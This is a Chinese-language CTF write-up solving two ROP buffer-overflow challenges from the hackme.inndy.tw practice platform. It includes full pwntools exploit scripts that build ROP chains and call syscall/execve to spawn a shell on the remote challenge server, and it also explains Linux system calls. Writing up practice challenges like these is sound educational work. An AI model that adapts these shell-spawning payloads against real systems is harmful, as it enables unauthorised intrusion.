题目来源:国外的一个ctf平台https://hackme.inndy.tw/
rop
题目提示:ROP buffer overflow
很明显是一个栈溢出 要用rop来获取shell
防护机制
发现至开启了NX
拖到IDA反编译一下
可以看到有很多函数 ,不管是用到的还是没用的都有,说明它的是静态连接
我们可以通过ROPgadget 来直接构造ropchain
命令为 ROPgadget --binary rop --ropchain
栈的大小可以通过peda的pattern search 来找到
先生成 长度为100的字符串 pattern create 100
然后执行程序 将字符串贴上
栈的大小为12
exp:
from pwn import *
from struct import pack
sh = remote('hackme.inndy.tw',7704)
junk = 'a'*12 + "BBBB" # junk + ebp
p = junk
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
sh.sendline(p)
sh.interactive()
ROP2
这一题提示:ROPgadget not working anymore
说明不可以再通过ROPgadget来构造ropchain了
检查下防护机制 只开启了NX
运行了下观察程序的逻辑
程序要求你输入一串字符串 然后打印出了一堆东西
拖到ida反编译一下
发现了syscall函数
去查了一线syscall函数是什么
syscall 是系统调用,指运行在使用者空间的程序向操作系统内核请求需要更高权限运行的服务。系统调用提供用户程序与操作系统之间的接口。大多数系统交互式操作需求在内核态执行。如设备IO操作或者进程间通信。
Linux 的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。操作系统实现系统调用的基本过程是:
- 应用程序调用库函数(API);
- API 将系统调用号存入 EAX,然后通过中断调用使系统进入内核态;
- 内核中的中断处理函数根据系统调用号,调用对应的内核函数(系统调用);
- 系统调用完成相应功能,将返回值存入 EAX,返回到中断处理函数;
- 中断处理函数返回到 API 中;
- API 将 EAX 返回给应用程序。
应用程序调用系统调用的过程是:
- 把系统调用的编号存入 EAX;
- 把函数参数存入其它通用寄存器;
- 触发 0x80 号中断(int 0x80)。
想详细的了解系统调用可以看这一篇博客https://blog.csdn.net/gatieme/article/details/50779184
程序中的syscall(4,1,&v4,42) 和syscall(3,0,&v1,1024) 分别调用了write()函数和read函数的系统调用
这题可以将syscall中的第一个参数设置为execve()函数的调用号,第二个参数设置为“/bin/sh”参数的地址 来执行execve()获取shell
execve()函数的系统调用可以通过http://syscalls.kernelgrok.com/ 这个网址查到 为0xb
所以解题思路为:
1.通过栈溢出,覆盖返回地址为syscall()函数地址,依次压入参数调用read()函数的系统调用,将“/bin/sh\x00“ 写入bss段
2.然后再通过syscall(0xb,bss,0,0)调用execve()函数
exp:
from pwn import*
p = remote('hackme.inndy.tw',7703)
elf = ELF('./rop2')
bss = elf.bss()
syscall = elf.symbols['syscall']
overflow = elf.symbols['overflow']
p.recv()
payload = 'a'*0xC + 'bbbb' + p32(syscall) + p32(overflow) # junk + target_address + return_address
payload += p32(3) + p32(0) + p32(bss) + p32(8) #syscall(3,0,bss_add,8)
p.send(payload)
p.send("/bin/sh\x00")
payload1 = 'a'*0xc + "BBBB" + p32(syscall)
payload1 += p32(overflow)+ p32(0xb) + p32(bss) + p32(0) + p32(0) #syscall(0xb,bss_add,0,0) = execve("bin/sh",0,0)
p.send(payload1)
p.interactive()